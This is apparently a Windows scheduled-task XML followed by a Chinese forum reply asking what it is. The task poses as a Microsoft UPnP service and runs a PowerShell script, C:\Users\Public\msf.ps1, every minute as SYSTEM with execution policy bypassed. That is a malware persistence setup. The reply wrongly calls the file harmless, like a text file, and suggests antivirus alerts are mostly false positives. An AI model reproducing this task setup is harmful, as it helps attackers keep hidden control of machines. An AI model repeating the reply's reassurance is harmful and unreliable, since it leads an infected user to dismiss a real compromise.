<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<RegistrationInfo>
<Date>2021-09-08T15:58:05</Date>
<Author>WORKGROUP\LAPTOP-OFQ29914$</Author>
<URI>\Microsoft\Windows\UPnPcwmipcnew\Services</URI>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<Repetition>
<Interval>PT1M</Interval>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2021-09-08T15:58:00</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>false</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<Duration>PT10M</Duration>
<WaitTimeout>PT1H</WaitTimeout>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="Author">
<Exec>
<Command>C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe</Command>
<Arguments>-ExecutionPolicy Bypass -File C:\Users\Public\msf.ps1</Arguments>
</Exec>
</Actions>
<Principals>
<Principal id="Author">
<UserId>S-1-5-18</UserId>
<RunLevel>LeastPrivilege</RunLevel>
</Principal>
</Principals>
</Task>
看起来像 windows 某个服务的配置信息,包含了 UserId(用户身份),运行级别RunLevel,启动命令Exec\Command
而根节点的节点名是 Task,看着像window的计划任务
就这个东西,这和你写个txt没啥区别,起作用的还是在程序怎么读取它,然后怎么处理的!
1.xml文件和txt,ini一样,里面是字符串格式的数据,它不是代码,不能执行,需要程序读取它然后解析里面的数据
2.如果exe文件报毒,很多时候是误报。比如我自己写的很多程序会读取配置文件,存储配置文件,杀毒软件检测到我的程序对文件进行操作就会认为它是个病毒。